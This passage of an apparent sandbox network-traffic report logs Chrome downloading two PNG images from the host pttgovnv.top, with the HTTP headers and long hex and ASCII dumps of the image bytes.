cb 5e 24 95 47 9d 7a a0 4d 31 b9 c7 85 47 69 cb 9a cc 1e 14 1b 42 e6 0f
          Data Ascii: {O[LA1F%{TUfwwNf/{znsgBLs!fKE=z_ef0+=3_3!FbR)T'ClY5_L3yW$4zd1Q^-3!Fvb#,6=i;hd&6f5^$GzM1GiB
          2024-09-01 22:25:26 UTC1369INData Raw: e4 f0 48 96 05 d4 6b 92 07 10 9d d1 cd ee ca e1 d4 22 36 e8 59 6a 0b 2d ab 8a 5c 2b 16 e9 e5 1c 58 ef ae 90 0e 15 c0 a5 c7 cd 40 be 17 19 be b9 55 67 eb dc 41 0c 66 5f 8b 9c 5f 65 3f 21 f4 7a a4 41 51 8c 0e 3f 6a de 7b 8e 4f 63 9a f7 c7 eb 3c 5b 4d 98 71 a9 98 bf 99 7d de a3 8c a2 51 53 d4 93 d7 f9 9e 85 4f f5 1f 5f 30 d4 0f 22 54 69 c1 37 af a3 11 79 96 25 dc 23 ea e2 ad bf 77 57 cd 0f 8a 4d 29 28 b0 d8 82 38 e4 05 e3 45 ad 79 af 35 29 26 6e cd 68 af b4 7c 5f e6 4f b7 d4 f0 c1 47 44 a7 d6 09 4f 8c 3d 6b 45 9e 51 65 5c c9 90 0f 2b e5 59 06 6f 92 bc 08 1f 8e 4a 23 36 da 1b dc fc 93 a4 b7 e7 3d ae 06 c3 73 60 9e 2e a5 03 81 0a 8d ee 3c 3a 03 79 5e 6a 28 af 18 b6 19 0b 17 fd a4 b1 53 a5 9c e3 77 a9 68 f5 bb 90 ca d6 74 7d d4 7f 5c ad 86 bc 87 60 1e 2e 3f 6c
          Data Ascii: Hk"6Yj-\+X@UgAf__e?!zAQ?j{Oc<[Mq}QSO_0"Ti7y%#wWM)(8Ey5)&nh|_OGDO=kEQe\+YoJ#6=s`.<:y^j(Swht}\`.?l
          2024-09-01 22:25:26 UTC1369INData Raw: 5f e0 ee ba 0a a8 4c b6 5e 22 e7 85 16 36 79 76 7c bc f8 00 4b d0 56 5f f0 8b 96 42 87 95 f0 ce f3 a5 12 ea b9 82 35 05 be 74 bc 26 f7 88 f5 1f 91 6e a6 58 ad ae 93 a2 85 61 b6 10 13 71 ad 44 4d 62 03 61 c7 fa 87 50 67 04 84 b0 c1 c7 16 2c c8 62 92 af 95 7a c2 49 ef 57 7a 54 d5 de 2b 7e 47 2b fa 60 fa 89 57 5d 40 b9 4a 2a 98 d0 32 d4 f2 3a 9c 95 9c 5c 86 d4 62 83 88 12 d1 79 7f 9e 9c 1b 91 f7 2b 5f 21 27 96 9f f7 d3 9e 40 ec 48 0a fe 4c e1 e2 ab d1 1a e0 65 18 9a f7 c5 16 20 36 ea 46 8d 3c f5 9d 5f 6a 5a 37 48 a3 35 a0 6e 28 45 cb 2b 84 36 e6 39 f6 f7 b8 b3 6b 67 fe 89 0d 4c 2a 5b b4 16 43 51 0f 2b ed 39 78 d2 f2 19 c6 7f 8b ba b6 58 bb 11 55 49 4b f7 d8 4e 04 0e b3 60 7c 36 b4 45 04 c3 04 e2 e0 6d ee ec 78 74 3e 21 b4 82 aa 92 cf a9 c5 06 bd cd 2d 3f 71
          Data Ascii: _L^"6yv|KV_B5t&nXaqDMbaPg,bzIWzT+~G+`W]@J*2:\by+_!'@HLe 6F<_jZ7H5n(E+69kgL*[CQ+9xXUIKN`|6Emxt>!-?q
          2024-09-01 22:25:26 UTC1369INData Raw: b0 33 60 00 d1 62 23 bd 3f 79 10 77 76 7a 4c db bb fc e9 97 1a ee ad 24 e2 71 ae 20 74 ff d8 d6 a4 e5 8e bc ec be 40 3d 13 f5 3d a3 9c c4 34 e4 50 59 0f 2d 75 09 fb 89 12 9b e5 d5 bd db 42 d0 2d 35 7c e9 97 1a ee bf 4c af 32 99 e7 08 c9 0b 39 26 74 99 43 28 e8 61 62 13 bc 60 91 a8 20 36 83 b7 07 a6 23 cf d1 f6 0e 77 56 36 24 8e 09 01 f3 bd c8 67 34 d2 53 b8 5a 97 32 8b 62 23 85 a9 5e 63 a3 05 90 59 28 f3 e6 b3 91 79 2e d5 70 74 21 27 f2 d0 97 66 a9 35 bf c6 9d 55 5f 44 8b 8d b4 8a b3 40 87 42 7d e9 97 da 4c 88 0d 86 96 b0 93 67 ff af ad 6e 8e 85 32 85 de a1 e6 4b e0 b7 e4 b3 ac c5 06 f3 9c 19 a0 0b 3c 7d e9 97 9a 8a cd f7 dd 59 53 d1 e1 ca 90 bc 41 5d b4 f9 7f dc 59 d9 11 ee cd 25 56 49 6c fa b1 68 3c a4 87 24 cf 81 e8 24 58 84 8a a5 04 19 98 19 c1 08 0d
          Data Ascii: 3`b#?ywvzL$q t@==4PY-uB-5|L29&tC(ab` 6#wV6$g4SZ2b#^cY(y.pt!'f5U_D@B}Lgn2K<}YSA]Y%VIlh<$$X


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          77192.168.2.449820104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/39.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 16498
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4072-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5H5Xnryr0YzWDh3YKgIxuhFq5aOAhB0vgn19AT6BODKJ5%2BU7XkNCqyXt3ESf4nDlbNt4Q1b4%2B5CS79KNIhcwBSDyyTEsUlZFQZn0cu3U63TrPKbS%2BIazOsltQAjm3k%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1a08265e7a-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3f ff 49 44 41 54 78 da ec dd 7f 90 1c e7 5d e7 f1 47 8e 90 65 23 7b 57 b6 93 d8 4e ae 76 44 52 21 0e 90 5d 61 02 94 8b 63 47 21 c9 5d 2a 47 34 c2 a1 7c 05 14 3b 22 1c 15 7e 5c b4 ba 40 01 a9 a2 34 aa 3b 0e a8 3a 4e a3 22 bf ae 80 ec ec fd 41 91 3b 27 9a 85 e3 b8 23 04 cd 72 c1 47 2e 17 34 9b 14 31 1c 38 9a 05 13 27 c1 b1 76 1d 25 96 15 c9 7b fd 9d f9 b6 dd 9a 9d 1f fd e3 e9 ee a7 67 de af aa c9 3a da dd de 9e 9e ee 7e 3e fd fc dc b3 b3 b3 63 00 00 00 50 2c 37 71 08 00 00 00 08 71
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<?IDATx]Ge#{WNvDR!]acG!]*G4|;"~\@4;:N"A;'#rG.418'v%{g:~>cP,7qq
          2024-09-01 22:25:26 UTC1369INData Raw: 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 e3 ec 3c 32 5f f2 5e 0b 1c 09 00 00 08 71 28 90 3d 0f 6c 74 bc 2f 75 2f c8 55 38 1a 00 00 a4 58 e6 ee ec ec 70 14 60 95 17 e0 ca de 97 f3 de 6b cd 7b 2d 6b b0 c3 34 dc 50 3e b4 51 f2 be 94 72 dc 85 ce ce 43 f3 1d 47 8f 4d 79 e4 75 f3 d0 7c 8b 33 08 00 21 0e 2e 04 b9 ba f7 e5 84 fe df 75 ef d5 f0 5e 4d 2f d0 6d 71 74 26 32 bc 49 13 ba 7c e6 8b 8e ec d2 b6 f7 6a 4b a8 f3 5e 12 8e da 5e 48 6a e7 70 5c aa de 97 9a f7 9a 0b f9 2b 1b f2 f3 de be 36 1d db af 35 dd af 36 67 3b 40 88 c3 74 04 39 b9 e1 cf f7 fd f3 ba 16 aa dd 82 95 50
          Data Ascii: !Bq8@ Bq8@ <2_^q(=lt/u/U8Xp`k{-k4P>QrCGMyu|3!.u^M/mqt&2I|jK^^Hjp\+656g;@t9P
          2024-09-01 22:25:26 UTC1369INData Raw: b2 8f b2 fd 9a 16 da b6 9a e5 a4 16 b1 aa b5 92 c5 bd 81 f4 e6 4d 3b 65 61 53 a7 6d 37 a7 0e d9 5f 09 73 2b 96 36 b7 e6 ed 73 65 c8 df 49 72 5e c7 bd 16 a4 5b 42 4d 6a 20 47 bc ff 9d 94 fe f6 a8 6b ab db 75 42 c2 34 77 3c c0 2e 6a e2 90 b7 8a 89 bf c2 c2 bc 16 94 73 21 7e ae 15 bb e0 ef d5 fa 55 35 2c 9e 36 83 6b fe a2 f2 97 16 ab 72 0a 64 f8 d0 f0 d0 7c 43 3f 43 1b ca 0e bd 35 39 c7 65 99 b8 b6 17 d4 16 72 f8 db 8b 23 5e 67 72 da 2f 80 10 07 a4 49 6b c7 ca c6 fe 52 59 bb 0a 1a 1d 10 91 68 5f b5 3f 9e ad 30 27 b5 7a 32 f0 a1 c1 99 90 69 90 ab 59 3a df 66 1c ec 17 27 e7 54 cb c1 29 50 e4 41 8b f3 1c 20 c4 61 12 83 9c 0e 28 18 d5 ff ec ac 7e 3f c9 44 bd cb 51 fb c7 85 08 73 67 2d 1c 82 25 9d 28 98 b9 c7 b2 63 ab 5f 62 c9 c1 f7 26 41 ae ea e0 7e c9 60 10 fa
          Data Ascii: M;eaSm7_s+6seIr^[BMj GkuB4w<.js!~U5,6krd|C?C59er#^gr/IkRYh_?0'z2iY:f'T)PA a(~?DQsg-%(c_b&A~`
          2024-09-01 22:25:26 UTC1369INData Raw: db f9 8c 02 9c 2f d5 a9 0d a4 56 ce 7b 49 cd db 71 73 63 13 ab 14 fe 1d 1d 7d 5a ac cf aa b7 8c d8 36 67 6d 61 c8 67 c5 54 19 00 08 71 b0 1e de fc 7e 6f 17 4d 3a fd de 72 0d 71 81 e0 d3 f0 5e a5 be 30 27 83 1e a4 af 5c 11 c3 1c b3 d8 17 47 9d 5a 38 00 84 38 d8 0e 70 59 f4 7b 1b 67 51 a7 71 c8 e6 3d df 18 e6 fc a9 44 e6 34 cc 6d e9 7a ab a5 69 0b 71 59 7e 06 53 66 83 a9 35 00 10 e2 60 b3 c0 2e eb 3a a7 67 4c b2 09 7b 6d a9 66 7e 0c 7a 61 ae ec fd e7 21 ef 75 d2 f4 26 05 96 63 21 cd ac 17 bd 20 27 73 cf 2d 3b 1c e8 5a 11 7e b6 13 e2 67 16 34 d4 a3 e0 e7 36 00 8c c2 c0 86 e2 86 37 09 24 0d 93 4e b3 a9 f4 fb 69 c7 dc b6 14 74 f5 5c 8e 49 6f b4 a7 fc ed ba 06 b6 72 e0 25 21 57 56 6d d8 d4 d0 e4 4f fe db ce 7b 40 84 ce 19 27 fb 15 a6 ff 62 98 99 ef e5 fd 2e 7b
          Data Ascii: /V{Iqsc}Z6gmagTq~oM:rq^0'\GZ88pY{gQq=D4mziqY~Sf5`.:gL{mf~za!u&c! 's-;Z~g467$Nit\Ior%!WVmO{@'b.{
          2024-09-01 22:25:26 UTC1369INData Raw: c9 f9 10 66 5e 38 39 5f 68 ae ce 47 c7 52 60 2f 59 de 2f 1b cb 8f 2d f2 f1 02 84 38 44 0b 47 2d d3 9b 10 36 49 f3 ea 4a 16 fd e4 74 32 e0 72 8c 20 77 81 c1 0e 63 0b 75 39 ae 27 42 fe 78 35 ab e5 d8 90 4e 88 33 f6 9b 2e b7 2c 9e 87 00 08 71 88 10 8e fc e6 d5 93 26 7e ad 9c df 4f 6e 21 ed 7d d5 02 68 2d 46 d0 a4 f9 6f 70 c1 29 e1 3b ec 1c 7b 27 75 80 0c f2 d1 b6 b4 9d ca 94 ec 17 00 42 dc d4 84 b9 ba 89 37 ad 87 6f 5e 83 5c 35 83 d0 29 37 fb a8 13 02 9f c9 6a 64 6d c1 48 28 9b 09 f1 73 ab 7a 8e 20 3f 1d 4b db 39 6a f9 3a 20 c4 01 84 38 38 10 e4 da de 4b 6a d3 64 d0 43 9c 5a 39 09 03 52 eb d5 cc a0 79 55 c2 62 d4 49 8c 33 a9 31 2c 0a 09 b5 26 5c 5f a4 55 3d de c8 f9 fa 34 f6 06 11 d8 ac 99 b6 15 e2 e6 68 52 05 08 71 48 5e 58 d4 4c b2 a9 48 64 c9 a6 4e da f3
          Data Ascii: f^89_hGR`/Y/-8DG-6IJt2r wcu9'Bx5N3.,q&~On!}h-Fop);{'uB7o^\5)7jdmH(sz ?K9j: 88KjdCZ9RyUbI31,&\_U=4hRqH^XLHdN
          2024-09-01 22:25:26 UTC1369INData Raw: 0c ce 43 39 8e 27 52 d8 7c ec b0 a4 7d e4 1a 26 9d 7e a1 84 38 80 10 87 02 d5 36 94 03 af 61 4f f7 d2 ec d9 34 ee 4c ca eb 87 bc 51 3a d3 dc 1c 6a 71 54 e3 e1 69 9f c5 df e2 5c 88 56 c3 52 c2 a5 fa 86 19 3b 7f 1d 00 42 1c dc 0d 75 7e b0 93 af f3 ae 07 3a 8c 0c ba 1d 93 ac d9 8d 19 fc d3 0b 73 d6 6a 38 2d 87 b9 c3 2c bd 05 10 e2 30 59 05 d7 42 e0 15 0c 76 eb 1a e8 5a dc f8 9d fc ec a4 70 4f 52 1b c7 ec fd c3 1f 76 e4 d8 c6 9d 3a 67 43 47 94 db de af 8a ee 53 dc 09 b7 d7 bd fd 2a f3 09 03 84 38 4c 7e 21 56 d2 50 57 d2 97 e8 18 87 d6 42 c5 f3 05 7b 3d 62 d8 70 76 4d 58 47 af 85 b2 09 3f 28 47 1e 7c 2a 69 5f 1f fa b9 fb fb 14 a6 e6 30 93 fd 02 08 71 80 db 85 9a 34 e3 cd 32 3d 87 93 61 23 cc 52 4f 5b d4 aa 26 3e d6 65 fd cf 60 df 4d b9 1e 72 1b 50 a3 83 21 4a
          Data Ascii: C9'R|}&~86aO4LQ:jqTi\VR;Bu~:sj8-,0YBvZpORv:gCGS*8L~!VPWB{=bpvMXG?(G|*i_0q42=a#RO[&>e`MrP!J
          2024-09-01 22:25:26 UTC1369INData Raw: 92 4d 5e dc b4 b9 4f da 57 4f 9a d7 82 fd a2 fc fe 4e f2 b7 1a 2e 35 8d e9 64 c7 b2 af 12 0c 06 75 c0 ef d7 f2 5e b2 ff 6d db a3 93 35 9c 2c 9b dd 7d ca d6 cd 0b cd 8a 9d 1c 8e 4f dd d8 9d 20 3b 89 45 0d 73 72 4c 96 33 9e e2 e7 f9 40 6b 7a a3 c4 cb 7a 2f 90 cf 4a 6a b4 3b 7a 9e d7 e3 7e 4e da 44 5d 0e 9c 87 8b 7d d7 90 7f 0e d2 6f 30 9d fb c0 42 e0 3e e0 0f ca 09 db f7 78 43 ef 0d fe 67 e4 7f ed e4 d9 87 1a 96 cb 5d d6 4e cd f5 42 ad 79 5f 4e 59 d8 d4 b6 77 51 ce 3a f2 9e 66 b5 f0 88 53 33 b2 a9 ab 2c d8 d8 0f b9 e9 35 42 dc f0 a4 30 aa 7a 7f b7 99 e3 31 5b 08 14 c2 49 07 87 24 ee b7 a5 9f 61 d3 8c 9f c8 79 5b 83 4b 23 a3 e3 54 d5 00 e7 f2 e0 17 59 05 a4 96 55 98 91 a6 64 d3 ab 89 1c bb 5f b2 32 49 84 cf 3f ee 3a c9 6b 7a ee 35 62 be 9f 72 df 3f c9 b5 61
          Data Ascii: M^OWON.5du^m5,}O ;EsrL3@kzz/Jj;z~ND]}o0B>xCg]NBy_NYwQ:fS3,5B0z1[I$ay[K#TYUd_2I?:kz5br?a
          2024-09-01 22:25:26 UTC1369INData Raw: 67 0e 87 09 72 f5 9c 6b c3 f3 1c 25 d9 d1 87 d7 b3 8e 7f 94 1b 51 e7 8d d4 fb 66 6d 82 6f 71 72 9d 52 1b e7 10 d6 4e 75 80 a5 35 47 6d 86 ba 25 bd 21 6d ea 93 68 f7 c5 e8 24 a7 03 b9 8d 20 97 47 e8 ad 8d fa db b2 da 42 37 c0 15 8c 04 39 e3 05 b9 f7 dc 75 66 54 61 28 e7 ca c2 14 5e 23 6d bd ef 2d 6b b3 ae 8b cd 8e dd d1 c4 31 7e af 66 d2 1d 28 e2 af 89 eb bf fa 95 f4 b5 90 e2 7e 2c 4f 78 50 25 c4 21 f6 85 51 31 6e cd 9b d4 1f ea 36 02 81 8e 4e ae bb 03 49 9a 4b 68 f5 17 30 ed 01 37 71 ff e6 3d 5f 90 e3 25 fb 3a 74 e4 9e f4 81 fb ae 27 ab 85 3d 1f 24 c8 7d df e5 b7 8e 9a 82 44 fa a6 d5 a6 6c 42 d5 cd e0 bc 6b 32 f1 b0 63 13 e0 ca b5 55 8f 33 57 a4 d6 c2 d9 7e 10 df d6 b0 df 8c ba 24 a1 ee 4f 45 8f ad cd 9a d7 19 69 ad a1 0c 20 c4 21 40 9a 17 b4 9f 8c cb 73
          Data Ascii: grk%QfmoqrRNu5Gm%!mh$ GB79ufTa(^#m-k1~f(~,OxP%!Q1n6NIKh07q=_%:t'=$}DlBk2cU3W~$OEi !@s
          2024-09-01 22:25:26 UTC1369INData Raw: 1c 9b 84 30 27 f3 cd b5 8b 3a f0 41 47 a4 d9 ba 91 6d 67 79 33 d7 29 54 56 33 3e 5e 12 78 07 76 3e eb 36 33 46 ad 85 bb 79 af f9 e3 ef 29 0d fe 9e 17 be a4 e6 cd 5c bf 94 6c 9f bd 00 b8 f3 99 7f 3d 30 c8 49 ed 9f 84 c8 a8 56 2f 7f 57 ac 90 9b a2 1a 77 57 2b c1 28 ce f5 54 cd a9 09 bb c3 a7 46 88 43 4e 37 0b 1d aa 2f a5 d7 49 7d 92 2b 32 09 41 ed 82 0e 57 b7 b9 cf 8d 1c 6e e6 59 17 de 43 9b 8a 7f e7 99 6f 89 bc b1 8f bc f6 65 83 47 a0 4a 80 8b 51 fb 36 94 34 b3 0e 09 72 dd 10 19 b1 7f 9c 8c 54 95 fe 7f 43 94 73 38 8f 99 b4 d5 8e a8 dd 14 4e 47 9d 8f d2 22 2b cd b7 53 30 f3 00 21 0e a9 86 39 69 7e 93 30 77 cc d8 9b ff 27 0f d2 bc da 72 6c ae ac 30 6c 16 b8 f5 1c ce 21 79 1a 5f cf fb 78 49 a0 89 3a 2f 9c 4c 25 22 83 0c 76 d7 2f fc a6 dd 00 d7 1f e4 fa f7 c3
          Data Ascii: 0':AGmgy3)TV3>^xv>63Fy)\l=0IV/WwW+(TFCN7/I}+2AWnYCoeGJQ64rTCs8NG"+S0!9i~0w'rl0l!y_xI:/L%"v/
          2024-09-01 22:25:26 UTC1369INData Raw: c6 ff cd 7d bb 47 b9 fe df 4b 5f 8b b4 db 0f 7c c3 13 23 af a9 94 8f da 36 27 4e ea f7 75 b9 5f 9f 72 74 f7 b2 98 e0 1b 19 a0 39 35 ff 0b 5d c2 db 39 33 7a 1a 0f e9 ec 7a ca fb d9 96 ab ef 23 b0 f8 b3 ed a6 d5 92 a3 6f b9 33 61 a7 62 2e 35 05 2f 8b 58 eb b5 b5 35 20 28 cd 7e 7b a8 df fd fd 3b 57 ba 21 6d 94 87 67 fe 20 d4 84 bf 66 66 f7 b3 c5 5f 7f f5 6a 91 3e 6f 6a fa d2 bb a7 cf ea bd da a5 00 27 a1 7d cd f4 d6 74 95 59 ae 97 f9 a4 08 71 b0 f3 a4 16 65 60 c0 a2 f7 3b 0d c7 83 5c cd f2 66 5d 9d c4 d2 56 88 9b 9d 92 d3 7d e0 03 c8 bd 61 02 53 9f 0b ff d8 17 e4 64 e5 84 5b c6 57 2a 48 38 93 39 e0 64 75 86 7e 52 4b f7 e7 2f fe 4f e6 07 6e 5b 0b b7 13 77 7d ef ae 7f fa f0 53 5f 8d f4 3e be 67 ff d0 f9 ed 36 0c 0a 1b e0 f4 5c cf bb f9 d4 0f 6d 32 8b cd 61 ef
          Data Ascii: }GK_|#6'Nu_rt95]93zz#o3ab.5/X5 (~{;W!mg ff_j>oj'}tYqe`;\f]V}aSd[W*H89du~RK/On[w}S_>g6\m2a


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          78192.168.2.449821172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/45.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 33304
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"8218-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HTDAzYJcmetVM5sjAt3cFPutL2ptv7pUupDsRiCtZ5W595iiJyFw7Obcqjdzh8wIm0D9Bku%2F%2BdcY%2BdgVA4U7rRamQ1%2BCrzzCIIpWaq8TjqMm4S0h4QeMq50RARtWbdM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1a6dfb8c47-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 81 a5 49 44 41 54 78 da ec 9d 0b 78 14 f5 bd f7 ff b9 ec 6e ee 09 21 24 dc 42 42 10 b9 08 12 2c a2 5c 94 20 1e db aa 55 5a 6b ad ad 3d a2 f6 9c 62 df b7 42 6d 6b 8f ed 6b c5 fa 9e 72 6a 5b c5 f6 7d d4 f6 b4 15 ce e9 cd 5a 2d 55 8b d6 23 12 14 10 28 ca b5 02 02 21 04 42 08 84 b0 b9 67 b3 b9 bc f3 9d ec 2c b3 bb b3 3b 33 bb b3 9b dd cd f7 f3 3c 03 9b dd d9 dd d9 99 ff cc ff 3b bf 6b ca c0 c0 80 20 84 10 42 08 21 89 45 2a 77 01 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxxn!$BB,\ UZk=bBmkkrj[}Z-U#(!Bg,;3<;k B!E*w!BE!B#B
          2024-09-01 22:25:26 UTC1369INData Raw: 11 47 08 21 84 10 42 11 47 08 21 84 10 42 28 e2 08 21 84 10 42 08 45 1c 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08 21 14 71 84 10 42 08 21 84 22 8e 10 42 08 21 84 22 8e 10 42 08 21 84 50 c4 11 42 08 21 84 10 8a 38 42 08 21 84 10 8a 38 42 08 21 84 10 42 11 47 08 21 84 10 42 28 e2 08 21 84 10 42 28 e2 08 21 84 10 42 08 45 1c 21 84 10 42 08 89 9c 74 ee 02 42 48 32 d0 5c 3a b9 5c fa af dc c0 aa b5 85 27 8f d4 72 8f 11 42 12 9d 94 81 81 01 ee 05 42 48 3c 8a b2 2a cf c3 4a 69 29 f0 2c 95 9e e7 f0 78 96 85 5f b7 57 5a 9c 9e c7 7b 3c 8f 9d 9e c7 42 12 7d d5 3c 22 84 10 8a 38 42 08 b9 28 d4 ca c5 a0 f5 ac ca f3 7f b9 47 a8 e5 47 f2 b9 3d b3 32 44 cf 25 79 c2 7e b4 55 d8 f7 76 5b b5 b9 2d 1e 51 57 eb 59 20 ec 68 d5 23 84 50 c4 11 42 86 85 60 ab f2 88
          Data Ascii: G!BG!B(!BE!BE!B#B!qB!"B!"B!PB!8B!8B!BG!B(!B(!BE!BtBH2\:\'rBBH<*Ji),x_WZ{<B}<"8B(GG=2D%y~Uv[-QWY h#PB`
          2024-09-01 22:25:26 UTC1369INData Raw: 22 5c 71 24 e2 d2 9b 5a 4d ad 8f a4 06 93 e4 4b e2 78 b3 24 74 cf a5 b6 f5 8e 44 79 94 3c 03 6f c2 b1 e9 2e 1f 23 06 6c e9 a9 67 1e 5a 50 3b f6 df de 3d 21 7c e3 15 f1 78 93 74 6c 4f 78 c4 dc 5a 8e 74 42 86 07 a9 dc 05 84 0c 0f f1 26 2d b5 d2 c3 e7 45 60 f0 fc 3a f7 a5 19 4d a9 2d 83 16 9e cc c3 75 46 3f 76 91 67 79 14 4b 8a bb af c2 cc 36 d9 cf b7 c4 d5 3e b2 9f 35 27 e2 7a 47 3a 4c 7f 47 e6 47 27 f3 60 a9 0c 55 df ce 9f ce eb 8b c4 80 c3 26 3f 96 c4 75 79 fd 9a 25 38 8e b3 c5 60 59 14 35 38 ae cf e3 38 7b c4 3a 21 84 22 8e 10 92 c0 e2 ad 4a 5a aa 35 c4 5b 8b 47 04 4c ec bc a9 30 df b1 b3 b3 48 79 21 b7 fa 54 58 df e5 1e 93 6b 6a 7d 24 37 c4 95 88 33 9b d4 50 9c 67 fa 3b c2 d9 b7 6d b3 02 bc d3 77 4b 42 ae b2 f0 e4 11 08 b5 89 9e e3 d8 a2 21 e6 aa 3d 6e
          Data Ascii: "\q$ZMKx$tDy<o.#lgZP;=!|xtlOxZtB&-E`:M-uF?vgyK6>5'zG:LGG'`U&?uy%8`Y588{:!"JZ5[GL0Hy!TXkj}$73Pg;mwKB!=n
          2024-09-01 22:25:26 UTC1369INData Raw: 99 d4 90 f7 b7 e3 a6 3f bb 63 76 85 a9 f5 8d ba 51 b5 80 1b d5 27 d6 31 35 75 41 fd 9a 25 70 db df 23 7c 33 58 9f 62 d2 03 21 14 71 84 10 7d 01 07 f7 55 b5 b4 a8 fb 99 22 58 a9 2a ed 82 fb 9f d4 eb 62 f2 36 e3 e6 54 40 f2 01 7a 72 9a c1 4c 3f 55 25 b9 c1 0c 43 d5 b9 21 5a 49 0d e1 f4 49 c5 67 bb 4d 5a 31 23 75 a3 6a b0 a6 f0 e4 91 b5 18 6f 9e 71 a7 80 f1 c8 1e ac 84 50 c4 11 42 82 08 b8 65 1e 01 a7 2e dc 8b 00 f3 aa d6 3b c6 e4 d8 f6 76 fb f8 41 23 71 ab ea f4 e4 d4 c4 4c 3f 55 24 37 98 61 a8 3a 37 98 4d 6a e8 2d b2 1b 5a 2f eb 43 f3 bd 67 db e6 97 9a 5a df 2a 37 aa 1f b3 50 38 d8 53 24 ba 4a f8 b6 ee 9a e5 11 72 cb 78 b6 12 42 11 47 08 b9 28 e0 56 49 ff 3d 2f 2e 26 29 40 d5 dc e3 69 99 e5 b4 37 b4 ad d5 7a 1f 26 f1 ac 7d e6 db 63 21 78 de 6c 9f 53 33 fd
          Data Ascii: ?cvQ'15uA%p#|3Xb!q}U"X*b6T@zrL?U%C!ZIIgMZ1#ujoqPBe.;vA#qL?U$7a:7Mj-Z/CgZ*7P8S$JrxBG(VI=/.&)@i7z&}c!xlS3
